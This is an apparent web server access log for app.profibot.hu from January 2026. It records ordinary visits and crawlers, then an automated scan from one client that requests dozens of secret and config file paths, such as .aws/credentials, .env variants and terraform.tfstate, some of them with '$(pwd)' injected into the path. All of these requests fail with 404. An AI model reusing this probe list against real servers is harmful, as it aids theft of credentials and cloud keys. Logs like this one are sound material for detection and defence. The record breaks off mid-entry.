- GET https app.profibot.hu "/docs" [Client 37.76.47.183] [Length 526] [Gzip 1.92] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:22:44:44 +0000] - 200 200 - GET https app.profibot.hu "/api/v1/openapi.json" [Client 37.76.47.183] [Length 15787] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/docs" +[22/Jan/2026:22:44:51 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 66.249.81.227] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[22/Jan/2026:22:44:51 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 66.249.81.227] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[22/Jan/2026:22:44:51 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 66.102.9.201] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[22/Jan/2026:22:54:43 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.76.47.183] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:03:04 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.76.47.183] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:57:33 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 23.27.145.111] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[23/Jan/2026:01:09:42 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 167.99.192.181] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[23/Jan/2026:01:09:42 +0000] - 404 404 - GET http app.profibot.hu "/favicon.ico" [Client 167.99.192.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://app.profibot.hu/" +[23/Jan/2026:01:09:42 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 167.99.192.181] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[23/Jan/2026:01:09:43 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 167.99.192.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "https://app.profibot.hu/" +[23/Jan/2026:07:30:12 +0000] - 404 404 - GET http app.profibot.hu "/robots.txt" [Client 74.7.228.13] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[23/Jan/2026:15:50:47 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 195.178.110.155] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0" "-" +[23/Jan/2026:17:00:20 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 35.232.136.192] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[23/Jan/2026:22:10:25 +0000] - 405 405 - POST http app.profibot.hu "/" [Client 185.177.72.22] [Length 31] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[23/Jan/2026:22:10:25 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 185.177.72.22] [Length 85] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:25 +0000] - 404 404 - GET http app.profibot.hu "/var/task/next.config.js" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:25 +0000] - 404 404 - GET http app.profibot.hu "/var/task/next.config.mjs" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:25 +0000] - 404 404 - GET http app.profibot.hu "/var/task/next.config.ts" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:25 +0000] - 404 404 - GET http app.profibot.hu "/app/next.config.js" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:25 +0000] - 404 404 - GET http app.profibot.hu "/app/next.config.mjs" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:25 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/next.config.js" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:25 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/next.config.mjs" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:25 +0000] - 404 404 - GET http app.profibot.hu "/var/task/nuxt.config.js" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:25 +0000] - 404 404 - GET http app.profibot.hu "/var/task/nuxt.config.ts" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:25 +0000] - 404 404 - GET http app.profibot.hu "/app/nuxt.config.js" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:25 +0000] - 404 404 - GET http app.profibot.hu "/var/task/serverless.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:25 +0000] - 404 404 - GET http app.profibot.hu "/var/task/serverless.yaml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/var/task/serverless.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/app/serverless.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/app/serverless.yaml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/serverless.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/serverless.yaml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/var/task/package.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/app/package.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/package.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/var/task/vercel.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/app/vercel.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/vercel.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/var/task/netlify.toml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/app/netlify.toml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/netlify.toml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/var/task/docker-compose.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/var/task/docker-compose.yaml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/app/docker-compose.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/docker-compose.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/.dockerignore" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/docker/overlay/config.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/opt/mailcow-dockerized/mailcow.conf" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/Dockerfile" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/docker/registry/config.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/docker-compose.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/.docker/config.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/.docker/secrets.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/attacker/docker-compose.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/_vercel/insights" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/vercel.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/aws/bucket" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/aws/buckets" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/aws/config/s3.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/aws/s3/credentials" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/aws/s3/env.env" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/aws_s3_bucket" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/aws_s3_config.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:26 +0000] - 404 404 - GET http app.profibot.hu "/s3/.aws/config" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/config/aws.php" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/.aws/config" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/aws-codecommit/" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/aws.yaml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/old/aws_config" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/aws.env.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/aws.env" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/aws-ses.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/aws/ses/smtp.env" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/aws/metadata" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/aws.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/aws.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/.aws/credentials" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/.env.aws" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/s3/credentials" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/s3/bucket.env" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/s3/bucket" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/s3/buckets" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/s3/backup" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/s3.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/s3.yaml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/s3.properties" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/s3.key" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/s3.secret" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/s3/.env.bak" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/root/.aws/credentials" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/root/.aws/config" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/home/*/.aws/credentials" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/.boto" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/root/.boto" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/.s3cfg" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/root/.s3cfg" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/etc/boto.cfg" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/.terraform/credentials.tfrc.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/terraform.tfstate" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:27 +0000] - 404 404 - GET http app.profibot.hu "/terraform.tfstate.backup" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/.terraform.tfstate" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/serverless.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/serverless.yaml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/sam-template.yaml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/template.yaml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/amplify/team-provider-info.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/.amplifyrc" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/terraform.tfstate" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/.terraform/terraform.tfstate" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/terraform.tfvars" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/*.auto.tfvars" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/app/terraform.tfstate" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/app/.terraform/terraform.tfstate" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/~/.aws/credentials" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/~/.aws/config" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/~/.boto" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/~/.s3cfg" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/.terraform.lock.hcl" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/terraform.tfvars" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/terraform/terraform.tfvars.json" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/var/task/amplify.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/var/task/amplify.yaml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/app/amplify.yml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/app/amplify.yaml" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/var/task/amplify/backend/function/*/src/index.js" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/.env" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/.env.local" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/.env.production" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/.env.development" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/$(pwd)/.env.staging" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/app/.env" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/app/.env.local" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/app/.env.production" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/var/www/.env" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:28 +0000] - 404 404 - GET http app.profibot.hu "/var/www/html/.env" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/opt/.env" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 +0000] - 404 404 - GET http app.profibot.hu "/srv/.env" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:29 